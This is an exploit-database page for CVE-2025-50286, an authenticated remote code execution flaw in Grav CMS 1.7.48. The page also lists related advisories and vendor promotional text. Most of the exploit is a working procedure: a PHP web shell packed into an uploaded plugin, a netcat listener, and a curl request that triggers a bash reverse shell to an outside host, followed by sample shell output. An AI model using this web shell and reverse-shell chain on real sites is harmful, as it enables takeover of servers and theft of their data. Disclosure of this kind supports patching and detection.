Vulners
Lucene search
📄 Grav CMS 1.7.48 Remote Code Execution
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | CVE-2025-50286 | 6 Aug 202500:00 | – | attackerkb |
 | CVE-2025-50286 | 6 Aug 202517:50 | – | circl |
 | Grav CMS 安全漏洞 | 6 Aug 202500:00 | – | cnnvd |
 | Grav CMS Remote Code Execution Vulnerability | 18 Aug 202500:00 | – | cnvd |
 | CVE-2025-50286 | 6 Aug 202500:00 | – | cve |
 | CVE-2025-50286 | 6 Aug 202500:00 | – | cvelist |
 | Exploit for Unrestricted Upload of File with Dangerous Type in Getgrav Grav | 28 Feb 202617:39 | – | githubexploit |
| Exploit for CVE-2025-50286 | 5 Aug 202501:46 | – | githubexploit |
 | Grav CMS 1.7.48 - Remote Code Execution (RCE) | 11 Aug 202500:00 | – | exploitdb |
 | EUVD-2025-23842 | 3 Oct 202520:07 | – | euvd |
10
# Exploit Title: Grav CMS 1.7.48 - Remote Code Execution (RCE)
# Date: 2025-08-07
# Exploit Author: binneko (https://github.com/binneko)
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav/releases/tag/1.7.48
# Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48
# Tested on: Debian 11, Apache2, PHP 7.4
# CVE: CVE-2025-50286
# Description:
Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to Authenticated Remote Code Execution (RCE)
through the "Direct Install" feature in the admin panel. An authenticated administrator can upload
a malicious plugin that contains arbitrary PHP code, which will be executed by the server upon access.
# Steps to Reproduce:
1. Start a listener on your attack machine:
nc -lvnp 4444
2. Log in to the Grav Admin Panel as an administrator:
https://<target>/admin
3. Navigate to:
Tools → Direct Install
4. Upload a ZIP archive containing the following structure:
evilplugin/
├── evilplugin.php # Contains: <?php shell_exec($_GET['cmd']); ?>
└── blueprints.yaml # Minimal content to pass plugin validation
5. Access the uploaded plugin’s endpoint and trigger the payload:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
6. Observe the reverse shell:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
# Notes:
- Authentication is required (admin-level).
- The vulnerability exists due to insufficient validation in the plugin upload feature (`/admin/tools/direct-install`).
- Successful exploitation may result in full system compromise.
# References:
- https://github.com/getgrav/grav
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50286
# Disclaimer:
This exploit is provided for educational and research purposes only.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2025 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 3.18.1
EPSS0.73126
SSVC